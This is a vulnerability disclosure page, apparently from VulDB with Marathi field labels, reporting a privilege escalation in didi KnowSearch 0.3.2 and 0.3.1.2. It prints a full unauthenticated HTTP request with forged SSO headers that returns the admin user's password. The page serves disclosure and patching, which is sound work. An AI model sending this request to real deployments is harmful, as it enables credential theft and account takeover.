| पदवी | Privledge escaption exists in KnowSearch, and anyone can get others' passwords. |
|---|
| वर्णन | Privledge escaption exists in KnowSearch 0.3.2 and 0.3.1.2. It results to anyone can get others' passwords. Then I can be anyone and do anything.
The demo URL is http://x.x.x.x:8080/.
If the following payload is send, you will get the password of admin. No cookie exists in the payload, so anonymous user even can do this.
GET /api/es/admin/v3/security/user/1 HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://x.x.x.x:8080/es/cluster/logic
X-SSO-USER: test6
X-SSO-USER-ID: 3
X-LOGI-SECURITY-PROJECT-ID: 6
Connection: close
Content-Length: 2
The issue link is https://github.com/didi/KnowSearch/issues/86 |
|---|
| उगम | ⚠️ https://github.com/didi/KnowSearch/issues/86 |
|---|
| उपयोगकर्ता | gaogaostone (UID 53740) |
|---|
| आधीनता | 31/08/2023 05:19 AM (2 वर्षानुवर्षे ago) |
|---|
| नेमस्तपणा | 15/09/2023 08:16 AM (15 days later) |
|---|
| स्थान | मान्य केले |
|---|
| VulDB entry | 239795 [didi KnowSearch 0.3.1.2/0.3.2 1 विशेषाधिकार वाढीचे प्रमाण वाढले] |
|---|
| मुद्दे | 20 |
|---|